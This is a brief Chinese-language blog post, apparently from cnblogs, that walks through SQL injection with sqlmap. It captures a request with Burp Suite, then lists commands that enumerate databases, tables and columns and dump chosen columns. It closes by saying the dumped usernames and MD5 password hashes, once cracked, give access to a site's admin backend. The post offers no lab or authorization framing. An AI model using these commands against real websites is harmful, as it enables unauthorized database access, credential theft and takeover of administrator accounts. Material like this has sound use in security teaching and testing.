SQL注入相关

Posted 2023-03-21 野荷

SQL注入相关

 

找到某个可以发起数据库请求页面，并确定该页面可以SQLI后，可以先用burpsuite抓 个request包

然后把包里的内容保存到文本里，例如SQLI.txt

 

sudo sqlmap -r SQLI.txt --dbs　　发送request，执行注入
sudo sqlmap -r SQLI.txt --current-db　　查看当前所在的数据库名称
sudo sqlmap -r SQLI.txt -D \'current db\' --tables　　查看当前数据中的table
sudo sqlmap -r SQLI.txt -D \'current db\' -T \'choose tab\' --columns　　选择当前数据库中的table并查看column
sudo sqlmap -r SQLI.txt -D \'current db\' -T \'choose tab\' -C \'choose col1,choose col2\' --dump　　选择想要查看的column并显示出来

一番操作后便可以得到用户名及由md5加密的密码

将密码解密后便可以用其登录网站管理后台了

本文来自博客园，作者：野荷，转载请注明原文链接：https://www.cnblogs.com/jhinjax/p/17240828.html